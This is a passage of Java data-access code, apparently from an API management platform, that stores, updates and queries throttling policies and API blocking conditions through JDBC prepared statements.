Condition} array * * @param pipelineId Id of the pipeline * @param conditions condition array to populate * @throws APIManagementException */ private void setJWTClaimConditions(int pipelineId, ArrayList<Condition> conditions) throws APIManagementException { Connection connection = null; PreparedStatement conditionsStatement = null; ResultSet resultSet = null; try { connection = APIMgtDBUtil.getConnection(); conditionsStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.GET_JWT_CLAIM_CONDITIONS_SQL); conditionsStatement.setInt(1, pipelineId); resultSet = conditionsStatement.executeQuery(); while (resultSet.next()) { JWTClaimsCondition jwtClaimsCondition = new JWTClaimsCondition(); jwtClaimsCondition.setClaimUrl(resultSet.getString(ThrottlePolicyConstants.COLUMN_CLAIM_URI)); jwtClaimsCondition.setAttribute(resultSet.getString(ThrottlePolicyConstants.COLUMN_CLAIM_ATTRIBUTE)); jwtClaimsCondition.setInvertCondition(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_IS_CLAIM_MAPPING)); conditions.add(jwtClaimsCondition); } } catch (SQLException e) { handleException("Failed to get jwt claim conditions for pipelineId: " + pipelineId, e); } finally { APIMgtDBUtil.closeAllConnections(conditionsStatement, connection, resultSet); } } /** * Updates API level policy. * <p>policy name and tenant id should be specified in <code>policy</code></p> * <p> * Exsisting policy will be deleted and new policy will be inserted to the database * with old POLICY_ID. Uses {@link #updateAPIPolicy(APIPolicy)} * to create new policy. * </p> * * @param policy updated policy object * @throws APIManagementException */ public APIPolicy updateAPIPolicy(APIPolicy policy) throws APIManagementException { Connection connection = null; PreparedStatement selectStatement = null; PreparedStatement deleteStatement = null; ResultSet resultSet = null; int oldPolicyId = 0; String oldPolicyUUID = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); if (policy != null) { if (policy.getPolicyName() != null && policy.getTenantId() != -1) { selectStatement = connection .prepareStatement(SQLConstants.ThrottleSQLConstants.GET_API_POLICY_ID_SQL); selectStatement.setString(1, policy.getPolicyName()); selectStatement.setInt(2, policy.getTenantId()); } else if (policy.getUUID() != null) { selectStatement = connection .prepareStatement(SQLConstants.ThrottleSQLConstants.GET_API_POLICY_ID_BY_UUID_SQL); selectStatement.setString(1, policy.getUUID()); } else { String errorMsg = "Policy object doesn't contain mandatory parameters. At least UUID or Name,Tenant Id" + " should be provided. Name: " + policy.getPolicyName() + ", Tenant Id: " + policy.getTenantId() + ", UUID: " + policy.getUUID(); log.error(errorMsg); throw new APIManagementException(errorMsg); } } else { String errorMsg = "Provided Policy to add is null"; log.error(errorMsg); throw new APIManagementException(errorMsg); } // Should return only single row resultSet = selectStatement.executeQuery(); if (resultSet.next()) { oldPolicyId = resultSet.getInt(ThrottlePolicyConstants.COLUMN_POLICY_ID); oldPolicyUUID = resultSet.getString(ThrottlePolicyConstants.COLUMN_UUID); } deleteStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.DELETE_API_POLICY_SQL); deleteStatement.setInt(1, policy.getTenantId()); deleteStatement.setString(2, policy.getPolicyName()); deleteStatement.executeUpdate(); policy.setPolicyId(oldPolicyId); if (!StringUtils.isBlank(oldPolicyUUID)) { policy.setUUID(oldPolicyUUID); } updateAPIPolicy(policy, connection); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback the add Api Policy: " + policy.toString(), ex); } } handleException("Failed to update api policy: " + policy.getPolicyName() + '-' + policy.getTenantId(), e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); APIMgtDBUtil.closeAllConnections(deleteStatement, null, null); } return policy; } /** * Updates Application level policy. * <p>policy name and tenant id should be specified in <code>policy</code></p> * * @param policy updated policy object * @throws APIManagementException */ public void updateApplicationPolicy(ApplicationPolicy policy) throws APIManagementException { Connection connection = null; PreparedStatement updateStatement = null; boolean hasCustomAttrib = false; String updateQuery; if (policy.getTenantId() == -1 || StringUtils.isEmpty(policy.getPolicyName())) { String errorMsg = "Policy object doesn't contain mandatory parameters. Name: " + policy.getPolicyName() + ", Tenant Id: " + policy.getTenantId(); log.error(errorMsg); throw new APIManagementException(errorMsg); } try { if (policy.getCustomAttributes() != null) { hasCustomAttrib = true; } connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateQuery = SQLConstants.UPDATE_APPLICATION_POLICY_SQL; if (hasCustomAttrib) { updateQuery = SQLConstants.UPDATE_APPLICATION_POLICY_WITH_CUSTOM_ATTRIBUTES_SQL; } } else if (!StringUtils.isBlank(policy.getUUID())) { updateQuery = SQLConstants.UPDATE_APPLICATION_POLICY_BY_UUID_SQL; if (hasCustomAttrib) { updateQuery = SQLConstants.UPDATE_APPLICATION_POLICY_WITH_CUSTOM_ATTRIBUTES_BY_UUID_SQL; } } else { String errorMsg = "Policy object doesn't contain mandatory parameters. At least UUID or Name,Tenant Id" + " should be provided. Name: " + policy.getPolicyName() + ", Tenant Id: " + policy.getTenantId() + ", UUID: " + policy.getUUID(); log.error(errorMsg); throw new APIManagementException(errorMsg); } updateStatement = connection.prepareStatement(updateQuery); if (!StringUtils.isEmpty(policy.getDisplayName())) { updateStatement.setString(1, policy.getDisplayName()); } else { updateStatement.setString(1, policy.getPolicyName()); } updateStatement.setString(2, policy.getDescription()); updateStatement.setString(3, policy.getDefaultQuotaPolicy().getType()); if (PolicyConstants.REQUEST_COUNT_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { RequestCountLimit limit = (RequestCountLimit) policy.getDefaultQuotaPolicy().getLimit(); updateStatement.setLong(4, limit.getRequestCount()); updateStatement.setString(5, null); } else if (PolicyConstants.BANDWIDTH_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { BandwidthLimit limit = (BandwidthLimit) policy.getDefaultQuotaPolicy().getLimit(); updateStatement.setLong(4, limit.getDataAmount()); updateStatement.setString(5, limit.getDataUnit()); } updateStatement.setLong(6, policy.getDefaultQuotaPolicy().getLimit().getUnitTime()); updateStatement.setString(7, policy.getDefaultQuotaPolicy().getLimit().getTimeUnit()); if (hasCustomAttrib) { updateStatement.setBlob(8, new ByteArrayInputStream(policy.getCustomAttributes())); if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateStatement.setString(9, policy.getPolicyName()); updateStatement.setInt(10, policy.getTenantId()); } else if (!StringUtils.isBlank(policy.getUUID())) { updateStatement.setString(9, policy.getUUID()); } } else { if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateStatement.setString(8, policy.getPolicyName()); updateStatement.setInt(9, policy.getTenantId()); } else if (!StringUtils.isBlank(policy.getUUID())) { updateStatement.setString(8, policy.getUUID()); } } updateStatement.executeUpdate(); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback the update Application Policy: " + policy.toString(), ex); } } handleException( "Failed to update application policy: " + policy.getPolicyName() + '-' + policy.getTenantId(), e); } finally { APIMgtDBUtil.closeAllConnections(updateStatement, connection, null); } } /** * Updates Subscription level policy. * <p>policy name and tenant id should be specified in <code>policy</code></p> * * @param policy updated policy object * @throws APIManagementException */ public void updateSubscriptionPolicy(SubscriptionPolicy policy) throws APIManagementException { Connection connection = null; PreparedStatement updateStatement = null; boolean hasCustomAttrib = false; String updateQuery; try { if (policy.getCustomAttributes() != null) { hasCustomAttrib = true; } if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateQuery = SQLConstants.UPDATE_SUBSCRIPTION_POLICY_SQL; if (hasCustomAttrib) { updateQuery = SQLConstants.UPDATE_SUBSCRIPTION_POLICY_WITH_CUSTOM_ATTRIBUTES_SQL; } } else if (!StringUtils.isBlank(policy.getUUID())) { updateQuery = SQLConstants.UPDATE_SUBSCRIPTION_POLICY_BY_UUID_SQL; if (hasCustomAttrib) { updateQuery = SQLConstants.UPDATE_SUBSCRIPTION_POLICY_WITH_CUSTOM_ATTRIBUTES_BY_UUID_SQL; } } else { String errorMsg = "Policy object doesn't contain mandatory parameters. At least UUID or Name,Tenant Id" + " should be provided. Name: " + policy.getPolicyName() + ", Tenant Id: " + policy.getTenantId() + ", UUID: " + policy.getUUID(); log.error(errorMsg); throw new APIManagementException(errorMsg); } connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); updateStatement = connection.prepareStatement(updateQuery); if (!StringUtils.isEmpty(policy.getDisplayName())) { updateStatement.setString(1, policy.getDisplayName()); } else { updateStatement.setString(1, policy.getPolicyName()); } updateStatement.setString(2, policy.getDescription()); updateStatement.setString(3, policy.getDefaultQuotaPolicy().getType()); if (PolicyConstants.REQUEST_COUNT_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { RequestCountLimit limit = (RequestCountLimit) policy.getDefaultQuotaPolicy().getLimit(); updateStatement.setLong(4, limit.getRequestCount()); updateStatement.setString(5, null); } else if (PolicyConstants.BANDWIDTH_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { BandwidthLimit limit = (BandwidthLimit) policy.getDefaultQuotaPolicy().getLimit(); updateStatement.setLong(4, limit.getDataAmount()); updateStatement.setString(5, limit.getDataUnit()); } updateStatement.setLong(6, policy.getDefaultQuotaPolicy().getLimit().getUnitTime()); updateStatement.setString(7, policy.getDefaultQuotaPolicy().getLimit().getTimeUnit()); updateStatement.setInt(8, policy.getRateLimitCount()); updateStatement.setString(9, policy.getRateLimitTimeUnit()); updateStatement.setBoolean(10, policy.isStopOnQuotaReach()); updateStatement.setString(11, policy.getBillingPlan()); if (hasCustomAttrib) { long lengthOfStream = policy.getCustomAttributes().length; updateStatement.setBinaryStream(12, new ByteArrayInputStream(policy.getCustomAttributes()), lengthOfStream); if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateStatement.setString(13, policy.getPolicyName()); updateStatement.setInt(14, policy.getTenantId()); } else if (!StringUtils.isBlank(policy.getUUID())) { updateStatement.setString(13, policy.getUUID()); } } else { if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateStatement.setString(12, policy.getPolicyName()); updateStatement.setInt(13, policy.getTenantId()); } else if (!StringUtils.isBlank(policy.getUUID())) { updateStatement.setString(12, policy.getUUID()); } } updateStatement.executeUpdate(); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback the update Subscription Policy: " + policy.toString(), ex); } } handleException( "Failed to update subscription policy: " + policy.getPolicyName() + '-' + policy.getTenantId(), e); } finally { APIMgtDBUtil.closeAllConnections(updateStatement, connection, null); } } /** * Updates global throttle policy in database * * @param policy updated policy obejct * @throws APIManagementException */ public void updateGlobalPolicy(GlobalPolicy policy) throws APIManagementException { Connection connection = null; PreparedStatement updateStatement = null; InputStream siddhiQueryInputStream; try { byte[] byteArray = policy.getSiddhiQuery().getBytes(Charset.defaultCharset()); int lengthOfBytes = byteArray.length; siddhiQueryInputStream = new ByteArrayInputStream(byteArray); connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateStatement = connection.prepareStatement(SQLConstants.UPDATE_GLOBAL_POLICY_SQL); } else if (!StringUtils.isBlank(policy.getUUID())) { updateStatement = connection.prepareStatement(SQLConstants.UPDATE_GLOBAL_POLICY_BY_UUID_SQL); } else { String errorMsg = "Policy object doesn't contain mandatory parameters. At least UUID or Name,Tenant Id" + " should be provided. Name: " + policy.getPolicyName() + ", Tenant Id: " + policy.getTenantId() + ", UUID: " + policy.getUUID(); log.error(errorMsg); throw new APIManagementException(errorMsg); } updateStatement.setString(1, policy.getDescription()); updateStatement.setBinaryStream(2, siddhiQueryInputStream, lengthOfBytes); updateStatement.setString(3, policy.getKeyTemplate()); if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateStatement.setString(4, policy.getPolicyName()); updateStatement.setInt(5, policy.getTenantId()); } else if (!StringUtils.isBlank(policy.getUUID())) { updateStatement.setString(4, policy.getUUID()); } updateStatement.executeUpdate(); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback the update Global Policy: " + policy.toString(), ex); } } handleException("Failed to update global policy: " + policy.getPolicyName() + '-' + policy.getTenantId(), e); } finally { APIMgtDBUtil.closeAllConnections(updateStatement, connection, null); } } /** * Retrieves list of available policy names under <code>policyLevel</code> * and user <code>username</code>'s tenant * * @param policyLevel policY level to filter policies * @param username username will be used to get the tenant * @return array of policy names * @throws APIManagementException */ public String[] getPolicyNames(String policyLevel, String username) throws APIManagementException { List<String> names = new ArrayList<String>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = null; int tenantID = APIUtil.getTenantId(username); try { conn = APIMgtDBUtil.getConnection(); if (PolicyConstants.POLICY_LEVEL_API.equals(policyLevel)) { sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICY_NAMES; } else if (PolicyConstants.POLICY_LEVEL_APP.equals(policyLevel)) { sqlQuery = SQLConstants.GET_APP_POLICY_NAMES; } else if (PolicyConstants.POLICY_LEVEL_SUB.equals(policyLevel)) { sqlQuery = SQLConstants.GET_SUB_POLICY_NAMES; } else if (PolicyConstants.POLICY_LEVEL_GLOBAL.equals(policyLevel)) { sqlQuery = SQLConstants.GET_GLOBAL_POLICY_NAMES; } ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantID); rs = ps.executeQuery(); while (rs.next()) { names.add(rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return names.toArray(new String[names.size()]); } /** * Sets deployment status vaule of a policy in database. * * @param policyLevel policy level * @param policyName name of the policy * @param tenantId tenant id of the policy * @param isDeployed deployment status. <code>true</code> if deployment successful, <code>false</code> if not * @throws APIManagementException */ public void setPolicyDeploymentStatus(String policyLevel, String policyName, int tenantId, boolean isDeployed) throws APIManagementException { Connection connection = null; PreparedStatement statusStatement = null; String query = null; if (PolicyConstants.POLICY_LEVEL_APP.equals(policyLevel)) { query = SQLConstants.UPDATE_APPLICATION_POLICY_STATUS_SQL; } else if (PolicyConstants.POLICY_LEVEL_SUB.equals(policyLevel)) { query = SQLConstants.UPDATE_SUBSCRIPTION_POLICY_STATUS_SQL; } else if (PolicyConstants.POLICY_LEVEL_API.equals(policyLevel)) { query = SQLConstants.ThrottleSQLConstants.UPDATE_API_POLICY_STATUS_SQL; } else if (PolicyConstants.POLICY_LEVEL_GLOBAL.equals(policyLevel)) { query = SQLConstants.UPDATE_GLOBAL_POLICY_STATUS_SQL; } try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); statusStatement = connection.prepareStatement(query); statusStatement.setBoolean(1, isDeployed); statusStatement.setString(2, policyName); statusStatement.setInt(3, tenantId); statusStatement.executeUpdate(); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback setting isDeployed flag: " + policyName + '-' + tenantId, ex); } } handleException("Failed to set deployment status to the policy: " + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(statusStatement, connection, null); } } /** * Populates common attribute data of the <code>policy</code> to <code>policyStatement</code> * * @param policyStatement prepared statement initialized of policy operation * @param policy <code>Policy</code> object with data * @throws SQLException */ private void setCommonParametersForPolicy(PreparedStatement policyStatement, Policy policy) throws SQLException { policyStatement.setString(1, policy.getPolicyName()); if (!StringUtils.isEmpty(policy.getDisplayName())) { policyStatement.setString(2, policy.getDisplayName()); } else { policyStatement.setString(2, policy.getPolicyName()); } policyStatement.setInt(3, policy.getTenantId()); policyStatement.setString(4, policy.getDescription()); policyStatement.setString(5, policy.getDefaultQuotaPolicy().getType()); //TODO use requestCount in same format in all places if (PolicyConstants.REQUEST_COUNT_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { RequestCountLimit limit = (RequestCountLimit) policy.getDefaultQuotaPolicy().getLimit(); policyStatement.setLong(6, limit.getRequestCount()); policyStatement.setString(7, null); } else if (PolicyConstants.BANDWIDTH_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { BandwidthLimit limit = (BandwidthLimit) policy.getDefaultQuotaPolicy().getLimit(); policyStatement.setLong(6, limit.getDataAmount()); policyStatement.setString(7, limit.getDataUnit()); } policyStatement.setLong(8, policy.getDefaultQuotaPolicy().getLimit().getUnitTime()); policyStatement.setString(9, policy.getDefaultQuotaPolicy().getLimit().getTimeUnit()); //policyStatement.setBoolean(9, APIUtil.isContentAwarePolicy(policy)); policyStatement.setBoolean(10, policy.isDeployed()); if (!StringUtils.isBlank(policy.getUUID())) { policyStatement.setString(11, policy.getUUID()); } else { policyStatement.setString(11, UUID.randomUUID().toString()); } } /** * Populated common attributes of policy type objects to <code>policy</code> * from <code>resultSet</code> * * @param policy initiallized {@link Policy} object to populate * @param resultSet {@link ResultSet} with data to populate <code>policy</code> * @throws SQLException */ private void setCommonPolicyDetails(Policy policy, ResultSet resultSet) throws SQLException { QuotaPolicy quotaPolicy = new QuotaPolicy(); String prefix = ""; if (policy instanceof APIPolicy) { prefix = "DEFAULT_"; } quotaPolicy.setType(resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_QUOTA_POLICY_TYPE)); if (resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_QUOTA_POLICY_TYPE) .equalsIgnoreCase(PolicyConstants.REQUEST_COUNT_TYPE)) { RequestCountLimit reqLimit = new RequestCountLimit(); reqLimit.setUnitTime(resultSet.getInt(prefix + ThrottlePolicyConstants.COLUMN_UNIT_TIME)); reqLimit.setTimeUnit(resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_TIME_UNIT)); reqLimit.setRequestCount(resultSet.getInt(prefix + ThrottlePolicyConstants.COLUMN_QUOTA)); quotaPolicy.setLimit(reqLimit); } else if (resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_QUOTA_POLICY_TYPE) .equalsIgnoreCase(PolicyConstants.BANDWIDTH_TYPE)) { BandwidthLimit bandLimit = new BandwidthLimit(); bandLimit.setUnitTime(resultSet.getInt(prefix + ThrottlePolicyConstants.COLUMN_UNIT_TIME)); bandLimit.setTimeUnit(resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_TIME_UNIT)); bandLimit.setDataAmount(resultSet.getInt(prefix + ThrottlePolicyConstants.COLUMN_QUOTA)); bandLimit.setDataUnit(resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_QUOTA_UNIT)); quotaPolicy.setLimit(bandLimit); } policy.setUUID(resultSet.getString(ThrottlePolicyConstants.COLUMN_UUID)); policy.setDescription(resultSet.getString(ThrottlePolicyConstants.COLUMN_DESCRIPTION)); policy.setDisplayName(resultSet.getString(ThrottlePolicyConstants.COLUMN_DISPLAY_NAME)); policy.setPolicyId(resultSet.getInt(ThrottlePolicyConstants.COLUMN_POLICY_ID)); policy.setTenantId(resultSet.getInt(ThrottlePolicyConstants.COLUMN_TENANT_ID)); policy.setTenantDomain(IdentityTenantUtil.getTenantDomain(policy.getTenantId())); policy.setDefaultQuotaPolicy(quotaPolicy); policy.setDeployed(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_DEPLOYED)); } public boolean isPolicyExist(String policyType, int tenantId, String policyName) throws APIManagementException { Connection connection = null; PreparedStatement isExistStatement = null; boolean isExist = false; String policyTable = null; if (PolicyConstants.POLICY_LEVEL_API.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.API_THROTTLE_POLICY_TABLE; } else if (PolicyConstants.POLICY_LEVEL_APP.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_APPLICATION_TABLE; } else if (PolicyConstants.POLICY_LEVEL_GLOBAL.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_GLOBAL_TABLE; } else if (PolicyConstants.POLICY_LEVEL_SUB.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_SUBSCRIPTION_TABLE; } try { String query = "SELECT " + PolicyConstants.POLICY_ID + " FROM " + policyTable + " WHERE TENANT_ID =? AND NAME = ? "; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); isExistStatement = connection.prepareStatement(query); isExistStatement.setInt(1, tenantId); isExistStatement.setString(2, policyName); ResultSet result = isExistStatement.executeQuery(); if (result != null && result.next()) { isExist = true; } } catch (SQLException e) { handleException("Failed to check is exist: " + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(isExistStatement, connection, null); } return isExist; } public boolean isPolicyDeployed(String policyType, int tenantId, String policyName) throws APIManagementException { Connection connection = null; PreparedStatement isExistStatement = null; boolean isDeployed = false; String policyTable = null; if (PolicyConstants.POLICY_LEVEL_API.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.API_THROTTLE_POLICY_TABLE; } else if (PolicyConstants.POLICY_LEVEL_APP.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_APPLICATION_TABLE; } else if (PolicyConstants.POLICY_LEVEL_GLOBAL.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_GLOBAL_TABLE; } else if (PolicyConstants.POLICY_LEVEL_SUB.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_SUBSCRIPTION_TABLE; } try { String query = "SELECT " + PolicyConstants.POLICY_IS_DEPLOYED + " FROM " + policyTable + " WHERE TENANT_ID =? AND NAME = ? "; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); isExistStatement = connection.prepareStatement(query); isExistStatement.setInt(1, tenantId); isExistStatement.setString(2, policyName); ResultSet result = isExistStatement.executeQuery(); if (result != null && result.next()) { isDeployed = result.getBoolean(PolicyConstants.POLICY_IS_DEPLOYED); } } catch (SQLException e) { handleException("Failed to check is exist: " + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(isExistStatement, connection, null); } return isDeployed; } /** * Add a block condition * * @param conditionType Type of the block condition * @param conditionValue value related to the type * @param tenantDomain tenant domain the block condition should be effective * @return uuid of the block condition if successfully added * @throws APIManagementException */ public String addBlockConditions(String conditionType, String conditionValue, String tenantDomain) throws APIManagementException { Connection connection = null; PreparedStatement insertPreparedStatement = null; boolean status = false; boolean valid = false; ResultSet rs = null; String uuid = null; try { String query = SQLConstants.ThrottleSQLConstants.ADD_BLOCK_CONDITIONS_SQL; if (APIConstants.BLOCKING_CONDITIONS_API.equals(conditionType)) { String extractedTenantDomain = MultitenantUtils.getTenantDomainFromRequestURL(conditionValue); if (extractedTenantDomain == null) { extractedTenantDomain = MultitenantConstants.SUPER_TENANT_DOMAIN_NAME; } if (tenantDomain.equals(extractedTenantDomain) && isValidContext(conditionValue)) { valid = true; } else { throw new APIManagementException("Couldn't Save Block Condition Due to Invalid API Context " + conditionValue); } } else if (APIConstants.BLOCKING_CONDITIONS_APPLICATION.equals(conditionType)) { String appArray[] = conditionValue.split(":"); if (appArray.length > 1) { String appOwner = appArray[0]; String appName = appArray[1]; if ((MultitenantUtils.getTenantDomain(appOwner).equals(tenantDomain)) && isValidApplication(appOwner, appName)) { valid = true; } else { throw new APIManagementException("Couldn't Save Block Condition Due to Invalid Application " + "name " + appName + " from Application " + "Owner " + appOwner); } } } else if (APIConstants.BLOCKING_CONDITIONS_USER.equals(conditionType)) { if (MultitenantUtils.getTenantDomain(conditionValue).equals(tenantDomain)) { valid = true; } else { throw new APIManagementException("Invalid User in Tenant Domain " + tenantDomain); } } else if (APIConstants.BLOCKING_CONDITIONS_IP.equals(conditionType)) { valid = true; } if (valid) { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); if (!isBlockConditionExist(conditionType, conditionValue, tenantDomain, connection)) { uuid = UUID.randomUUID().toString(); insertPreparedStatement = connection.prepareStatement(query); insertPreparedStatement.setString(1, conditionType); insertPreparedStatement.setString(2, conditionValue); insertPreparedStatement.setString(3, "TRUE"); insertPreparedStatement.setString(4, tenantDomain); insertPreparedStatement.setString(5, uuid); status = insertPreparedStatement.execute(); connection.commit(); status = true; } else { throw new BlockConditionAlreadyExistsException( "Condition with type: " + conditionType + ", value: " + conditionValue + " already exists"); } } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException( "Failed to rollback adding Block condition : " + conditionType + " and " + conditionValue, ex); } } handleException("Failed to add Block condition : " + conditionType + " and " + conditionValue, e); } finally { APIMgtDBUtil.closeAllConnections(insertPreparedStatement, connection, null); } if (status) { return uuid; } else { return null; } } /** * Get details of a block condition by Id * * @param conditionId id of the condition * @return Block conditoin represented by the UUID * @throws APIManagementException */ public BlockConditionsDTO getBlockCondition(int conditionId) throws APIManagementException { Connection connection = null; PreparedStatement selectPreparedStatement = null; ResultSet resultSet = null; BlockConditionsDTO blockCondition = null; try { String query = SQLConstants.ThrottleSQLConstants.GET_BLOCK_CONDITION_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); selectPreparedStatement = connection.prepareStatement(query); selectPreparedStatement.setInt(1, conditionId); resultSet = selectPreparedStatement.executeQuery(); if (resultSet.next()) { blockCondition = new BlockConditionsDTO(); blockCondition.setEnabled(resultSet.getBoolean("ENABLED")); blockCondition.setConditionType(resultSet.getString("TYPE")); blockCondition.setConditionValue(resultSet.getString("VALUE")); blockCondition.setConditionId(conditionId); blockCondition.setTenantDomain(resultSet.getString("DOMAIN")); blockCondition.setUUID(resultSet.getString("UUID")); } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback getting Block condition with id " + conditionId, ex); } } handleException("Failed to get Block condition with id " + conditionId, e); } finally { APIMgtDBUtil.closeAllConnections(selectPreparedStatement, connection, resultSet); } return blockCondition; } /** * Get details of a block condition by UUID * * @param uuid uuid of the block condition * @return Block conditoin represented by the UUID * @throws APIManagementException */ public BlockConditionsDTO getBlockConditionByUUID(String uuid) throws APIManagementException { Connection connection = null; PreparedStatement selectPreparedStatement = null; ResultSet resultSet = null; BlockConditionsDTO blockCondition = null; try { String query = SQLConstants.ThrottleSQLConstants.GET_BLOCK_CONDITION_BY_UUID_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); selectPreparedStatement = connection.prepareStatement(query); selectPreparedStatement.setString(1, uuid); resultSet = selectPreparedStatement.executeQuery(); if (resultSet.next()) { blockCondition = new BlockConditionsDTO(); blockCondition.setEnabled(resultSet.getBoolean("ENABLED")); blockCondition.setConditionType(resultSet.getString("TYPE")); blockCondition.setConditionValue(resultSet.getString("VALUE")); blockCondition.setConditionId(resultSet.getInt("CONDITION_ID")); blockCondition.setTenantDomain(resultSet.getString("DOMAIN")); blockCondition.setUUID(resultSet.getString("UUID")); } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback getting Block condition by uuid " + uuid, ex); } } handleException("Failed to get Block condition by uuid " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(selectPreparedStatement, connection, resultSet); } return blockCondition; } public List<BlockConditionsDTO> getBlockConditions(String tenantDomain) throws APIManagementException { Connection connection = null; PreparedStatement selectPreparedStatement = null; ResultSet resultSet = null; List<BlockConditionsDTO> blockConditionsDTOList = new ArrayList<BlockConditionsDTO>(); try { String query = SQLConstants.ThrottleSQLConstants.GET_BLOCK_CONDITIONS_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); selectPreparedStatement = connection.prepareStatement(query); selectPreparedStatement.setString(1, tenantDomain); resultSet = selectPreparedStatement.executeQuery(); while (resultSet.next()) { BlockConditionsDTO blockConditionsDTO = new BlockConditionsDTO(); blockConditionsDTO.setEnabled(resultSet.getBoolean("ENABLED")); blockConditionsDTO.setConditionType(resultSet.getString("TYPE")); blockConditionsDTO.setConditionValue(resultSet.getString("VALUE")); blockConditionsDTO.setConditionId(resultSet.getInt("CONDITION_ID")); blockConditionsDTO.setUUID(resultSet.getString("UUID")); blockConditionsDTO.setTenantDomain(resultSet.getString("DOMAIN")); blockConditionsDTOList.add(blockConditionsDTO); } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback getting Block conditions ", ex); } } handleException("Failed to get Block conditions", e); } finally { APIMgtDBUtil.closeAllConnections(selectPreparedStatement, connection, resultSet); } return blockConditionsDTOList; } /** * Update the block condition state true (Enabled) /false (Disabled) given the UUID * * @param conditionId id of the block condition * @param state blocking state * @return true if the operation was success * @throws APIManagementException */ public boolean updateBlockConditionState(int conditionId, String state) throws APIManagementException { Connection connection = null; PreparedStatement updateBlockConditionPreparedStatement = null; boolean status = false; try { String query = SQLConstants.ThrottleSQLConstants.UPDATE_BLOCK_CONDITION_STATE_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); updateBlockConditionPreparedStatement = connection.prepareStatement(query); updateBlockConditionPreparedStatement.setString(1, state.toUpperCase()); updateBlockConditionPreparedStatement.setInt(2, conditionId); updateBlockConditionPreparedStatement.executeUpdate(); connection.commit(); status = true; } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback updating Block condition with condition id " + conditionId, ex); } } handleException("Failed to update Block condition with condition id " + conditionId, e); } finally { APIMgtDBUtil.closeAllConnections(updateBlockConditionPreparedStatement, connection, null); } return status; } /** * Update the block condition state true (Enabled) /false (Disabled) given the UUID * * 